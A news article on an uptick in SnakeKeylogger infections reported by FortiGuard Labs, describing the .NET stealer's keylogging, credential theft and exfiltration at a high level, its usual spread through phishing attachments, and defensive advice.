Sneaky SnakeKeylogger slithers into Windows inboxes to steal sensitive secrets

Criminals are preying on Windows users yet again, this time in an effort to hit them with a keylogger that can also steal credentials and take screenshots.

In an alert this month, Fortinet's FortiGuard Labs warned of an uptick in SnakeKeylogger infections. Once running on someone's PC, this malware records the victim's keystrokes as they log into things, fishes usernames and passwords out of their files, and takes screenshots to snoop on people, and then sends all that sensitive info to fraudsters.

"Based on the FortiGuard telemetry, there were hundreds of zero-day detection hits," the threat intelligence group said, adding that the logger was spotted contacting outside servers multiple times.

By zero-day detection, Fortinet means in this context software that was acting suspiciously though was not yet in its database of known software nasties, indicating the SnakeKeylogger encountered by its antivirus was a new strain, as far as Fortinet was concerned. A signature to detect the malware was added to FortiGuard's detection engine on July 31, in version 92.06230.

SnakeKeylogger, aka KrakenKeylogger, is a Microsoft .NET-based stealer already known for credential theft and keylogging capabilities. It was originally sold on a subscription basis on Russian crime forums.

The malware became a "significant threat" in November 2020, according to Splunk's threat research team, and it's known for its crafty exfiltration of data from victims' devices. It uses FTP to transfer people's private files and SMTP to send emails containing sensitive data, and it integrated with messaging app Telegram, allowing crooks to receive stolen info in real time.

"Moreover, it exhibits an adeptness in gathering clipboard data, browser credentials, and conducting system and network reconnaissance," Splunk's security researchers noted.

Additionally, the malware "demonstrates a notable sophistication by utilizing a variety of cryptors or loaders to obfuscate its code and evade detection by sandboxes," the team added. 

• Breaking the economy of trust: How busts affect malware gangs
• Fortune 50 biz coughed up record-breaking $75M ransom to halt leak of stolen data
• 'LockBit of phishing' EvilProxy used in more than a million attacks every month
• Beware of fake CrowdStrike domains pumping out Lumma infostealing malware

While the Fortinet alert doesn't specify how the criminals are breaking into machines to deploy SnakeKeylogger, this stealer is usually spread via phishing campaigns. We've asked for additional details about these attacks, and will update this story if we hear back from Fortinet.

In a separate alert about SnakeKeylogger's use in hijacking victims' online accounts, using their stolen creds, Check Point said malicious code is typically hidden in a maliciously crafted Office document or PDF attached to an email, and once the recipient opens that document, the payload finds a way to fetch and run the logger.

"The malware embedded in the document is typically a downloader," the security shop explained. "It uses PowerShell scripts to download a copy of Snake Keylogger to the infected system and execute it."

This is probably also the case in the recent rash of infections. Among other steps for network defenders to take to protect their organizations from the keylogger, FortiGuard Labs recommends: "Be cautious when opening emails, clicking links, and downloading attachments."

Plus, the org offers other reminders that apply to protecting against all sorts of malware-dropping attacks. 

These include keeping security services up to date using the most recent versions of databases and engines. Plus, turn on antivirus and sandbox features in local and network policies, and use endpoint security products that protect users both pre- and post-exploitation. ®